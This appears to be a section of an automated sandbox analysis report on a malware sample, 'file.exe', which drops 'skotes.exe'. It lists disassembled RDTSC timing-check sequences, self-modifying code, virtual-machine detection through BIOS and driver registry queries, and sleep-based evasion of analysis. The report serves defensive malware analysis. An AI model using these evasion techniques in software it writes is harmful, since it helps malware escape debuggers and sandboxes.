Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0428 second address: 4CE043A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075D128EFEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D0069A second address: 4D006CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 movsx ebx, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F075CBABED5h 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F075CBABECDh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D006CC second address: 4D006E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D006E9 second address: 4D006EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D006EF second address: 4D006F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D006F5 second address: 4D00709 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov si, bx 0x0000000f mov di, FBF4h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00709 second address: 4D00728 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F075D128EFEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00728 second address: 4D00745 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F075CBABECDh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e mov esi, 55A65869h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00745 second address: 4D007AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 call 00007F075D128F04h 0x0000000a pushfd 0x0000000b jmp 00007F075D128F02h 0x00000010 and al, 00000068h 0x00000013 jmp 00007F075D128EFBh 0x00000018 popfd 0x00000019 pop eax 0x0000001a popad 0x0000001b mov eax, dword ptr [76FA65FCh] 0x00000020 jmp 00007F075D128EFFh 0x00000025 test eax, eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F075D128F05h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D007AF second address: 4D007BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABECCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D007BF second address: 4D007DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F07CF34C08Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D007DC second address: 4D007E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D007E0 second address: 4D007E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D007E6 second address: 4D007EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D007EC second address: 4D007F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D007F0 second address: 4D00870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, eax 0x0000000a jmp 00007F075CBABED0h 0x0000000f xor eax, dword ptr [ebp+08h] 0x00000012 pushad 0x00000013 mov ecx, edi 0x00000015 pushfd 0x00000016 jmp 00007F075CBABED3h 0x0000001b sub ax, EE7Eh 0x00000020 jmp 00007F075CBABED9h 0x00000025 popfd 0x00000026 popad 0x00000027 and ecx, 1Fh 0x0000002a jmp 00007F075CBABECEh 0x0000002f ror eax, cl 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F075CBABED7h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00870 second address: 4D00888 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075D128F04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00888 second address: 4D008B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F075CBABED5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D008B1 second address: 4D008C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 push esi 0x00000007 pop edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b retn 0004h 0x0000000e nop 0x0000000f mov esi, eax 0x00000011 lea eax, dword ptr [ebp-08h] 0x00000014 xor esi, dword ptr [00372014h] 0x0000001a push eax 0x0000001b push eax 0x0000001c push eax 0x0000001d lea eax, dword ptr [ebp-10h] 0x00000020 push eax 0x00000021 call 00007F0761AF96F5h 0x00000026 push FFFFFFFEh 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D008C7 second address: 4D008CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D008CB second address: 4D008E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D008E2 second address: 4D008E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D008E8 second address: 4D008EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D008EC second address: 4D0093F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c jmp 00007F075CBABED6h 0x00000011 ret 0x00000012 nop 0x00000013 push eax 0x00000014 call 00007F076157C714h 0x00000019 mov edi, edi 0x0000001b jmp 00007F075CBABED0h 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F075CBABED0h 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D0093F second address: 4D00943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00943 second address: 4D00947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00947 second address: 4D0094D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D0094D second address: 4D00963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABED2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00963 second address: 4D00967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB002F second address: 4CB0033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0033 second address: 4CB0075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F075D128EFEh 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F075D128F00h 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F075D128F07h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0075 second address: 4CB0092 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 call 00007F075CBABECBh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e and esp, FFFFFFF8h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0092 second address: 4CB0096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0096 second address: 4CB00A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABECCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB00A6 second address: 4CB0175 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F075D128F06h 0x0000000f push eax 0x00000010 jmp 00007F075D128EFBh 0x00000015 xchg eax, ecx 0x00000016 pushad 0x00000017 jmp 00007F075D128F04h 0x0000001c pushfd 0x0000001d jmp 00007F075D128F02h 0x00000022 sbb cx, B6C8h 0x00000027 jmp 00007F075D128EFBh 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 mov edi, eax 0x00000032 popad 0x00000033 push eax 0x00000034 pushad 0x00000035 call 00007F075D128EFAh 0x0000003a pop edx 0x0000003b mov esi, 1607757Dh 0x00000040 popad 0x00000041 xchg eax, ebx 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007F075D128F06h 0x00000049 sbb eax, 1B936B88h 0x0000004f jmp 00007F075D128EFBh 0x00000054 popfd 0x00000055 mov ebx, ecx 0x00000057 popad 0x00000058 mov ebx, dword ptr [ebp+10h] 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e mov eax, edi 0x00000060 jmp 00007F075D128F03h 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0175 second address: 4CB017B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB017B second address: 4CB017F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB017F second address: 4CB01E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a mov edx, eax 0x0000000c pushad 0x0000000d movzx ecx, bx 0x00000010 mov dx, B8F4h 0x00000014 popad 0x00000015 popad 0x00000016 mov dword ptr [esp], esi 0x00000019 jmp 00007F075CBABED3h 0x0000001e mov esi, dword ptr [ebp+08h] 0x00000021 jmp 00007F075CBABED6h 0x00000026 xchg eax, edi 0x00000027 jmp 00007F075CBABED0h 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F075CBABECDh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB01E7 second address: 4CB01ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB01ED second address: 4CB0204 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABED3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0204 second address: 4CB022B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov si, di 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB022B second address: 4CB0231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0231 second address: 4CB029A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007F075D128F09h 0x0000000f je 00007F07CF3972B7h 0x00000015 pushad 0x00000016 jmp 00007F075D128EFCh 0x0000001b mov dx, cx 0x0000001e popad 0x0000001f cmp dword ptr [esi+08h], DDEEDDEEh 0x00000026 pushad 0x00000027 mov ch, 52h 0x00000029 mov dx, 3E2Ah 0x0000002d popad 0x0000002e je 00007F07CF3972A7h 0x00000034 jmp 00007F075D128F01h 0x00000039 mov edx, dword ptr [esi+44h] 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB029A second address: 4CB02AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABECFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB02AD second address: 4CB030A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F075D128EFEh 0x00000011 test edx, 61000000h 0x00000017 pushad 0x00000018 mov bx, si 0x0000001b popad 0x0000001c jne 00007F07CF397298h 0x00000022 jmp 00007F075D128EFFh 0x00000027 test byte ptr [esi+48h], 00000001h 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov di, 91C6h 0x00000032 mov si, di 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB030A second address: 4CB0310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0711 second address: 4CA0740 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e push ebx 0x0000000f push esi 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F075D128EFDh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0740 second address: 4CA0750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABECCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0750 second address: 4CA0789 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F075D128F08h 0x00000012 add si, 2308h 0x00000017 jmp 00007F075D128EFBh 0x0000001c popfd 0x0000001d push ecx 0x0000001e pop edi 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0789 second address: 4CA07B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F075CBABECBh 0x00000009 adc cl, 0000004Eh 0x0000000c jmp 00007F075CBABED9h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA07B7 second address: 4CA07DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F075D128F06h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA07DA second address: 4CA07E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA07E9 second address: 4CA0856 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F075D128EFFh 0x00000009 adc ah, FFFFFFBEh 0x0000000c jmp 00007F075D128F09h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F075D128F00h 0x00000018 add ah, FFFFFFB8h 0x0000001b jmp 00007F075D128EFBh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 and esp, FFFFFFF8h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F075D128F05h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0856 second address: 4CA08F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F075CBABECEh 0x0000000f push eax 0x00000010 jmp 00007F075CBABECBh 0x00000015 xchg eax, ebx 0x00000016 pushad 0x00000017 call 00007F075CBABED4h 0x0000001c mov edi, eax 0x0000001e pop ecx 0x0000001f call 00007F075CBABED7h 0x00000024 movzx esi, bx 0x00000027 pop ebx 0x00000028 popad 0x00000029 xchg eax, esi 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F075CBABECEh 0x00000031 adc cx, 9868h 0x00000036 jmp 00007F075CBABECBh 0x0000003b popfd 0x0000003c movzx ecx, di 0x0000003f popad 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F075CBABED1h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA08F5 second address: 4CA0905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075D128EFCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0905 second address: 4CA0909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0909 second address: 4CA0932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007F075D128F07h 0x0000000e mov esi, dword ptr [ebp+08h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0932 second address: 4CA094D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA094D second address: 4CA09B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F075D128EFFh 0x00000009 and cl, FFFFFFCEh 0x0000000c jmp 00007F075D128F09h 0x00000011 popfd 0x00000012 mov dl, cl 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebx, 00000000h 0x0000001c jmp 00007F075D128F08h 0x00000021 test esi, esi 0x00000023 pushad 0x00000024 mov ecx, 4A81568Dh 0x00000029 mov esi, 1039CE89h 0x0000002e popad 0x0000002f je 00007F07CF39E8D7h 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA09B8 second address: 4CA09D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F075CBABED7h 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA09D5 second address: 4CA0A0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F075D128F07h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0A0F second address: 4CA0A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABED4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0A27 second address: 4CA0A5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d jmp 00007F075D128F06h 0x00000012 je 00007F07CF39E849h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pop eax 0x0000001c pop edi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0A5F second address: 4CA0A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0A63 second address: 4CA0ABE instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 test byte ptr [76FA6968h], 00000002h 0x0000000f pushad 0x00000010 push ebx 0x00000011 mov edx, ecx 0x00000013 pop esi 0x00000014 pushfd 0x00000015 jmp 00007F075D128EFBh 0x0000001a sub cl, 0000001Eh 0x0000001d jmp 00007F075D128F09h 0x00000022 popfd 0x00000023 popad 0x00000024 jne 00007F07CF39E80Bh 0x0000002a jmp 00007F075D128EFEh 0x0000002f mov edx, dword ptr [ebp+0Ch] 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0ABE second address: 4CA0AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 37E99E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 523A68 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 54BD6A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 52DA0C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5B58B2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: F2E99E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 10D3A68 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 10FBD6A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 10DDA0C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 11658B2 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04D20E78 rdtsc 0_2_04D20E78
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 380 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8187 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1372 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5368 Thread sleep count: 60 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5368 Thread sleep time: -120060s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7164 Thread sleep count: 53 > 30 Jump to behavior
